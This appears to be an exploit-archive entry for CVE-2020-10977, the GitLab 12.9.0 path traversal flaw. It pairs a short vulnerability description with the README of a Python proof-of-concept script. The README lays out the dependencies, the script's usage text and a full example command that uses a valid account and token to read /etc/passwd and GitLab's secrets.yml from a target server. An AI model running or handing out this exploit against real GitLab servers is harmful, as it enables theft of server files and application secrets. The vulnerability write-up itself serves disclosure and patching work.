POC details: 10794da809ea68116819125ee5c30da9c8a05806

Source
Related vulnerability
Title: GitLab path traversal vulnerability (CVE-2020-10977)
Description: GitLab is a self-hosted Git repository application written in Ruby on Rails by GitLab Inc. (United States); it lets users browse a project's files, commit history, issue list and so on. GitLab EE and CE from 8.5 through 12.9.0 (fixed in 12.9.1, 12.8.8 and 12.7.9) contain a path traversal vulnerability: when an issue is moved to another project, GitLab copies the files referenced by the upload links in the issue description, and the file path taken from the link is not sanitised, so `../` segments escape the uploads directory. An authenticated attacker can use this to read files outside the intended directory on the GitLab server.
Description
A script meant to improve on the exploit-db PoC for the authenticated arbitrary file read in GitLab v12.9.0 (CVE-2020-10977)
Introduction
## The warn

For demonstration purposes and ethical hacking only.

## The what

A script meant to improve on the exploit-db PoC for the authenticated arbitrary file read in GitLab v12.9.0 (CVE-2020-10977). It is authenticated: you need a valid account on the target, and the impact is reading any file the GitLab service user can read (the `secrets.yml` in the example below holds the Rails secrets).

## The how

1. Install the two dependencies (you probably already have everything else)

`pip3 install requests python-gitlab`

2. Create a personal access token with your credentials. The script drives the GitLab REST API through python-gitlab, so the token needs the `api` scope; the user name and password are still required for the web session.

[https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html](https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html)

3. Profit?

```
$ python3 gitlab-12.9.0-file-read.py -h
usage: gitlab-12.9.0-file-read.py [-h] -H HOST -u USER -p PASSWD -t TOKEN -f FILES

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  The https URI to gitlab webroot
  -u USER, --user USER  The user name
  -p PASSWD, --passwd PASSWD
                        The user password
  -t TOKEN, --token TOKEN
                        The access token
  -f FILES, --files FILES
                        The absolute paths to the files on the Gitlab local system
```

```
$ python3 gitlab-12.9.0-file-read.py -H https://gitlab.domain.com/ -u erk3 -p test1234 -t 9nsDFXshb1txxkkZAv24 -f /etc/passwd -f /etc/hosts -f /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
```

File snapshot

```
[4.0K] /data/pocs/10794da809ea68116819125ee5c30da9c8a05806
├── [4.2K] gitlab-12.9.0-file-read.py
└── [1.3K] README.md

0 directories, 2 files
```